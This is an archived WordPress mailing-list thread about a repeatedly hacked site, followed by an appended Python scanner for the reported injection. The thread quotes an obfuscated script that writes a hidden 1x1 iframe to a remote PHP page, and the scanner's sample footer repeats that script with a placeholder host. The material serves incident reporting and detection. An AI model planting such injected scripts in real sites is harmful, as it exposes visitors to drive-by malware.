[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Baki Goxhaj banago at gmail.com
Sun Oct 31 15:27:34 UTC 2010


I agree with Vid - try switching hosts first.

Kindly,

Baki Goxhaj
www.wplancer.com | www.banago.info | www.lintuts.com


On 31 October 2010 16:17, Vid Luther <vid at zippykid.com> wrote:

> Mladen,
>  Instead of switching platforms completely, I would recommend first
> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
> wpengine, my company, or even godaddy.. their UI sucks, but their phone
> support is fairly decent.
>
> As for the exploit, it may not be a WordPress exploit, but an FTP
> attack, as it's just looking for filesystem paths and injecting to it.
>
> I'm assuming by default theme footer, you meant twentyten theme, and
> footer.php ?
>
>
>
> Mladen Adamovic wrote:
> > Hi guys,
> >
> > My WordPress software instance was repeatedly hacked ... running latest
> > WordPress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it used and couldn't identify it, but it was
> > adding the following code to my default theme footer.php:
> >
> > <script>
> > enc =
> >
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify the
> > exploit it used.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> --
> Vid Luther
> Founder
> ZippyKid
> http://zippykid.com/
> 210-789-0369
>
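
Added example (not part of the original thread and not WordPress code): one way to detect the pattern reported above, a percent-encoded string in a theme file that decodes to an invisible iframe. The function names, thresholds and the sample footer with its placeholder host are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

STRING_LITERAL = re.compile(r"""(["'])([^"'<>]{12,})\1""")
PERCENT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SIZE_ATTR = re.compile(r"""\b(?:width|height)\s*=\s*["']?(\d+)""", re.I)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
CSS_HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def is_hidden(tag):
    """True for a frame the visitor cannot see: 0-2 px sides or CSS hiding."""
    sizes = [int(n) for n in SIZE_ATTR.findall(tag)]
    return (bool(sizes) and max(sizes) <= 2) or bool(CSS_HIDDEN.search(tag))


def scan_source(text):
    """Return one finding per iframe found inside a percent-encoded string."""
    findings = []
    for lit in STRING_LITERAL.finditer(text):
        raw = lit.group(2)
        if len(PERCENT_ESCAPE.findall(raw)) < 5:  # ordinary string, skip
            continue
        # Rejoin literals split by line wrapping, then decode like unescape().
        # Limitation: JavaScript's %uXXXX form is not decoded here.
        decoded = unquote(re.sub(r"\s*\n\s*", "", raw))
        for tag in IFRAME_TAG.findall(decoded):
            src = SRC_ATTR.search(tag)
            findings.append({
                "line": text.count("\n", 0, lit.start()) + 1,
                "src": src.group(1) if src else None,
                "hidden": is_hidden(tag),
            })
    return findings


# Constructed sample: a theme footer with the reported pattern appended.
# The host name is a placeholder, not the one from the report.
SAMPLE_FOOTER = """<div id="footer"><?php wp_footer(); ?></div>
<script>
enc = "%3Ciframe%20width%3D1%20height%3D1%20frameborder%3D0%20src%3D%27http%3A//
bad.example.invalid/x.php%27%3E%3C/iframe%3E";
document.write(unescape(enc));
</script>
"""

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_FOOTER):
        print(finding)
```

Running scan_source() over every .php and .js file under wp-content shows which files carry the injection; it does not show how the attacker got write access.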

